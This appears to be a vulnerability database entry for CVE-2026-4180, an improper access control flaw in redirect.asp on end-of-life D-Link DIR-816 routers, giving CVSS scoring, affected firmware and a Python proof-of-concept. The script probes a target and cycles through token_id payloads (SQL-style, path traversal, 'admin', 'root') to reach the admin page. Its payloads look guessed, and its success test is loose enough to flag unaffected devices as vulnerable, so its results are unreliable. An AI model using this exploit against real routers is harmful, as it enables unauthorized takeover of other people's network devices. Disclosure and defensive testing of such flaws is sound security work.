Security Vulnerability Report
CVE-2026-4180 CVSS 7.3 HIGH

Published: 2026-03-16 14:19:59
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in D-Link DIR-816 1.10CNB05. The impacted element is an unknown function of the file redirect.asp of the component goahead. The manipulation of the argument token_id leads to improper access controls. The attack may be initiated remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-816 firmware version 1.10CNB05

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-4180 PoC - D-Link DIR-816 Token ID Bypass
# Target: D-Link DIR-816 devices running firmware 1.10CNB05


def check_vulnerability(target_ip, target_port=80):
    """Check if target is vulnerable to CVE-2026-4180"""
    # Construct the vulnerable URL with manipulated token_id
    url = f"http://{target_ip}:{target_port}/redirect.asp"

    # Try to bypass access control with crafted token_id
    params = {
        'token_id': 'admin',  # Attempting to impersonate admin
        'url': 'http://example.com'
    }

    try:
        response = requests.get(url, params=params, timeout=10)

        # Check for successful bypass indicators
        if response.status_code == 200:
            # Check response content for access control bypass signs
            if 'login' not in response.text.lower() or 'redirect' in response.text.lower():
                return True, "Vulnerable - Access control bypassed"

        return False, "Not vulnerable or target not responding"
    except requests.exceptions.RequestException as e:
        return None, f"Error: {str(e)}"


def exploit_token_id_injection(target_ip, target_port=80):
    """Exploit CVE-2026-4180 to gain unauthorized access"""
    url = f"http://{target_ip}:{target_port}/redirect.asp"

    # Payload variations for token_id manipulation
    payloads = [
        {'token_id': '1 OR 1=1', 'url': '/admin/'},
        {'token_id': '../../admin', 'url': '/admin/'},
        {'token_id': 'admin', 'url': '/admin/'},
        {'token_id': 'root', 'url': '/admin/'},
        {'token_id': '{"admin": true}', 'url': '/admin/'}
    ]

    for payload in payloads:
        try:
            response = requests.get(url, params=payload, timeout=10)
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[*] Payload: {payload}")
                print(f"[*] Response length: {len(response.content)}")
                print(f"[*] Status: Potential access granted\n")
        except requests.exceptions.RequestException:
            continue


if __name__ == "__main__":
    target = "192.168.0.1"  # Replace with target IP
    is_vuln, message = check_vulnerability(target)
    print(f"Vulnerability Check Result: {message}")

References

Raw JSON Data
